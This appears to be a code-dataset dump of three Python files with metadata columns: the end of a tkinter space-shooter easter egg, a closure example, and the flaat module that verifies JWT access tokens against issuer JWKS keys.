rivalBeam.append('rivalBeam' + str(rivalBeamCount))
rivalBeam.append(str(X))
rivalBeam.append('0')
rivalBeamCount += 1
root.after(beamSpeed, moveThings)
def playSound(soundFile):
command = 'aplay ' + soundFile
global soundPlayer
soundPlayer = subprocess.Popen(command.split())
def beamSound(soundFile='/home/pi/ORIZIN_Agent/sounds/soundEffects/wav/laser1.wav'):
command = 'aplay ' + soundFile
subprocess.Popen(command.split())
root.after(1000, beamSound)
def stopSound():
soundPlayer.terminate()
def changeBeamSpeed():
global beamSpeed
beamSpeed -= 2
root.after(300, changeBeamSpeed)
atexit.register(stopSound)
root = tk.Tk()
root.title('ORIZIN Easter Egg')
root.geometry("500x300")
root.bind('<Control-q>', shutdown)
root.bind('<Left>', leftPressed)
root.bind('<Right>', rightPressed)
root.bind('<space>', spacePressed)
playSound('/home/pi/ORIZIN_Agent/sounds/musics/wav/natsuhasummer.wav')
gameCanvas = tk.Canvas(root, bg='black')
gameCanvas.pack(anchor=tk.NW, expand=1, fill=tk.BOTH)
gameTitle = tk.Label(gameCanvas, text='Space Battleship Game', bg='black', fg='red', font=('', 30, 'bold', 'roman', 'normal', 'normal'))
gameTitle.pack(expand=0, fill=tk.BOTH)
promptStart = tk.Label(gameCanvas, text='スペースキーを押してスタート', bg='black', fg='red', font=('', 15, 'bold', 'roman', 'normal', 'normal'))
promptStart.pack(anchor=tk.NW, expand=1, fill=tk.BOTH)
root.mainloop()
| en | 0.406466 | # -*- coding: utf8 -*- | 2.82461 | 3 |
Decorators'@'/Closure.py | shubham-11700069/Python | 0 | 6614049 | <filename>Decorators'@'/Closure.py<gh_stars>0
def outer_function(msg):
def inner_function():
print(msg)
return inner_function
hi_func=outer_function('Hi')
bye_func=outer_function('Bye')
hi_func()
bye_func()
| <filename>Decorators'@'/Closure.py<gh_stars>0
def outer_function(msg):
def inner_function():
print(msg)
return inner_function
hi_func=outer_function('Hi')
bye_func=outer_function('Bye')
hi_func()
bye_func()
| none | 1 | 2.939373 | 3 | |
flaat/access_tokens.py | BorjaEst/flaat | 1 | 6614050 | # This code is distributed under the MIT License
import base64
from dataclasses import dataclass
import logging
from typing import Optional, List
import jwt
from flaat.exceptions import FlaatUnauthenticated
from flaat.issuers import IssuerConfig
logger = logging.getLogger(__name__)
# Expand this list in a sensible way
PERMITTED_SIGNATURE_ALGORITHMS = [
"RS256",
"RS384",
"RS512",
]
def _base64_url_encode(data):
"""Decode base64 encode data"""
if not isinstance(data, bytes):
data = data.encode("utf-8")
encode = base64.urlsafe_b64encode(data)
return encode.decode("utf-8").rstrip("=")
@dataclass
class AccessTokenInfo:
"""Infos from a JWT access token"""
header: dict
""" The JWTs JOSE header """
body: dict
""" The JWTs data payload """
signature: str
""" The JWTs JWS signature """
verification: Optional[dict]
""" Infos about the verification of the JWT.
If set to `None`, then the JWT data is unverified."""
def __init__(self, complete_decode, verification=Optional[dict]):
self.header = complete_decode.get("header", {})
self.body = complete_decode.get("payload", {})
self.signature = _base64_url_encode(complete_decode.get("signature", b""))
self.verification = verification
@property
def issuer(self) -> str:
return self.body.get("iss", "")
class FlaatPyJWKClient(jwt.PyJWKClient):
"""Fixes the jwt.PyJWKClient class:
* get_signing_keys
* does not call self.get_jwk_set(), since it fails when "enc" keys are present
* returns only keys used for signing (e.g. filters out keys with "use" == "enc")
* get_signing_key_from_jwt
* tries to retrieve keys by id only if "kid" is specified in token header
* otherwise, it tries to infer the key type ("kty") from the algorithm used to sign the token ("alg")
* "alg" is always present in JWT header
* an additional method get_signing_key_by_alg
"""
def get_signing_keys(self) -> List[jwt.api_jwk.PyJWK]:
data = self.fetch_data()
# filter for signing keys, i.e. "use" in ["sig", None]
keys = [
key for key in data.get("keys", []) if key.get("use", None) in ["sig", None]
]
signing_keys = jwt.PyJWKSet(keys)
if not signing_keys:
raise jwt.exceptions.PyJWKClientError(
"The JWKS endpoint did not contain any signing keys"
)
return signing_keys.keys
def get_signing_key_by_alg(self, alg: str) -> jwt.api_jwk.PyJWK:
# algorithm is none, then signing key is None; signature must be empty octet string
if alg == "none":
return jwt.api_jwk.PyJWK({}, algorithm="none")
# infer key type from algorithm
key_type = ""
if alg.startswith("RS") or alg.startswith("PS"):
key_type = "RSA"
if alg.startswith("HS"):
key_type = "oct"
if alg.startswith("ES"):
key_type = "EC"
if alg.startswith("Ed"):
key_type = "OKP"
signing_keys = self.get_signing_keys()
signing_key = None
for key in signing_keys:
if key.key_type == key_type:
signing_key = key
break
if not signing_key:
raise jwt.exceptions.PyJWKClientError(
f'Unable to find a signing key that matches alg: "{alg}"'
)
return signing_key
def get_signing_key_from_jwt(self, token: str) -> jwt.api_jwk.PyJWK:
unverified = jwt.api_jwt.decode_complete(
token, options={"verify_signature": False}
)
header = unverified["header"]
kid = header.get("kid", None)
if kid:
return self.get_signing_key(kid)
# alg MUST be present, possible values defined at https://datatracker.ietf.org/doc/html/rfc7518#section-3.1
alg = header.get("alg", None)
if alg:
return self.get_signing_key_by_alg(alg)
raise FlaatUnauthenticated(
"Could not verify JWT: The token header did not contain an 'alg'."
)
def get_access_token_info(access_token, verify=True) -> Optional[AccessTokenInfo]:
unverified = {}
try:
unverified = jwt.api_jwt.decode_complete(
access_token,
options={
"verify_signature": False,
},
)
unverified_body = unverified.get("payload", {})
except jwt.DecodeError:
return None
if not verify:
return AccessTokenInfo(unverified, verification=None)
issuer = IssuerConfig.get_from_string(unverified_body.get("iss", ""))
if issuer is None:
raise FlaatUnauthenticated("Could not verify JWT: No 'iss' claim in body")
jwks_uri = issuer.issuer_config.get("jwks_uri", "")
if jwks_uri == "":
raise FlaatUnauthenticated(
"Could not verify JWT: Issuer config has no jwks_uri"
)
jwk_client = FlaatPyJWKClient(jwks_uri)
signing_key = jwk_client.get_signing_key_from_jwt(access_token)
try:
complete_decode = jwt.api_jwt.decode_complete(
access_token,
signing_key.key,
algorithms=PERMITTED_SIGNATURE_ALGORITHMS,
options={"verify_aud": False},
)
except jwt.exceptions.PyJWTError as e:
raise FlaatUnauthenticated(f"Could not verify JWT: {e}") from e
return AccessTokenInfo(
complete_decode,
verification={"algorithm": complete_decode.get("header", {}).get("alg", "")},
)
| # This code is distributed under the MIT License
import base64
from dataclasses import dataclass
import logging
from typing import Optional, List
import jwt
from flaat.exceptions import FlaatUnauthenticated
from flaat.issuers import IssuerConfig
logger = logging.getLogger(__name__)
# Expand this list in a sensible way
PERMITTED_SIGNATURE_ALGORITHMS = [
"RS256",
"RS384",
"RS512",
]
def _base64_url_encode(data):
"""Decode base64 encode data"""
if not isinstance(data, bytes):
data = data.encode("utf-8")
encode = base64.urlsafe_b64encode(data)
return encode.decode("utf-8").rstrip("=")
@dataclass
class AccessTokenInfo:
"""Infos from a JWT access token"""
header: dict
""" The JWTs JOSE header """
body: dict
""" The JWTs data payload """
signature: str
""" The JWTs JWS signature """
verification: Optional[dict]
""" Infos about the verification of the JWT.
If set to `None`, then the JWT data is unverified."""
def __init__(self, complete_decode, verification=Optional[dict]):
self.header = complete_decode.get("header", {})
self.body = complete_decode.get("payload", {})
self.signature = _base64_url_encode(complete_decode.get("signature", b""))
self.verification = verification
@property
def issuer(self) -> str:
return self.body.get("iss", "")
class FlaatPyJWKClient(jwt.PyJWKClient):
"""Fixes the jwt.PyJWKClient class:
* get_signing_keys
* does not call self.get_jwk_set(), since it fails when "enc" keys are present
* returns only keys used for signing (e.g. filters out keys with "use" == "enc")
* get_signing_key_from_jwt
* tries to retrieve keys by id only if "kid" is specified in token header
* otherwise, it tries to infer the key type ("kty") from the algorithm used to sign the token ("alg")
* "alg" is always present in JWT header
* an additional method get_signing_key_by_alg
"""
def get_signing_keys(self) -> List[jwt.api_jwk.PyJWK]:
data = self.fetch_data()
# filter for signing keys, i.e. "use" in ["sig", None]
keys = [
key for key in data.get("keys", []) if key.get("use", None) in ["sig", None]
]
signing_keys = jwt.PyJWKSet(keys)
if not signing_keys:
raise jwt.exceptions.PyJWKClientError(
"The JWKS endpoint did not contain any signing keys"
)
return signing_keys.keys
def get_signing_key_by_alg(self, alg: str) -> jwt.api_jwk.PyJWK:
# algorithm is none, then signing key is None; signature must be empty octet string
if alg == "none":
return jwt.api_jwk.PyJWK({}, algorithm="none")
# infer key type from algorithm
key_type = ""
if alg.startswith("RS") or alg.startswith("PS"):
key_type = "RSA"
if alg.startswith("HS"):
key_type = "oct"
if alg.startswith("ES"):
key_type = "EC"
if alg.startswith("Ed"):
key_type = "OKP"
signing_keys = self.get_signing_keys()
signing_key = None
for key in signing_keys:
if key.key_type == key_type:
signing_key = key
break
if not signing_key:
raise jwt.exceptions.PyJWKClientError(
f'Unable to find a signing key that matches alg: "{alg}"'
)
return signing_key
def get_signing_key_from_jwt(self, token: str) -> jwt.api_jwk.PyJWK:
unverified = jwt.api_jwt.decode_complete(
token, options={"verify_signature": False}
)
header = unverified["header"]
kid = header.get("kid", None)
if kid:
return self.get_signing_key(kid)
# alg MUST be present, possible values defined at https://datatracker.ietf.org/doc/html/rfc7518#section-3.1
alg = header.get("alg", None)
if alg:
return self.get_signing_key_by_alg(alg)
raise FlaatUnauthenticated(
"Could not verify JWT: The token header did not contain an 'alg'."
)
def get_access_token_info(access_token, verify=True) -> Optional[AccessTokenInfo]:
unverified = {}
try:
unverified = jwt.api_jwt.decode_complete(
access_token,
options={
"verify_signature": False,
},
)
unverified_body = unverified.get("payload", {})
except jwt.DecodeError:
return None
if not verify:
return AccessTokenInfo(unverified, verification=None)
issuer = IssuerConfig.get_from_string(unverified_body.get("iss", ""))
if issuer is None:
raise FlaatUnauthenticated("Could not verify JWT: No 'iss' claim in body")
jwks_uri = issuer.issuer_config.get("jwks_uri", "")
if jwks_uri == "":
raise FlaatUnauthenticated(
"Could not verify JWT: Issuer config has no jwks_uri"
)
jwk_client = FlaatPyJWKClient(jwks_uri)
signing_key = jwk_client.get_signing_key_from_jwt(access_token)
try:
complete_decode = jwt.api_jwt.decode_complete(
access_token,
signing_key.key,
algorithms=PERMITTED_SIGNATURE_ALGORITHMS,
options={"verify_aud": False},
)
except jwt.exceptions.PyJWTError as e:
raise FlaatUnauthenticated(f"Could not verify JWT: {e}") from e
return AccessTokenInfo(
complete_decode,
verification={"algorithm": complete_decode.get("header", {}).get("alg", "")},
)
| en | 0.727378 | # This code is distributed under the MIT License # Expand this list in a sensible way Decode base64 encode data Infos from a JWT access token The JWTs JOSE header The JWTs data payload The JWTs JWS signature Infos about the verification of the JWT. If set to `None`, then the JWT data is unverified. Fixes the jwt.PyJWKClient class: * get_signing_keys * does not call self.get_jwk_set(), since it fails when "enc" keys are present * returns only keys used for signing (e.g. filters out keys with "use" == "enc") * get_signing_key_from_jwt * tries to retrieve keys by id only if "kid" is specified in token header * otherwise, it tries to infer the key type ("kty") from the algorithm used to sign the token ("alg") * "alg" is always present in JWT header * an additional method get_signing_key_by_alg # filter for signing keys, i.e. "use" in ["sig", None] # algorithm is none, then signing key is None; signature must be empty octet string # infer key type from algorithm # alg MUST be present, possible values defined at https://datatracker.ietf.org/doc/html/rfc7518#section-3.1 | 2.481725 | 2 |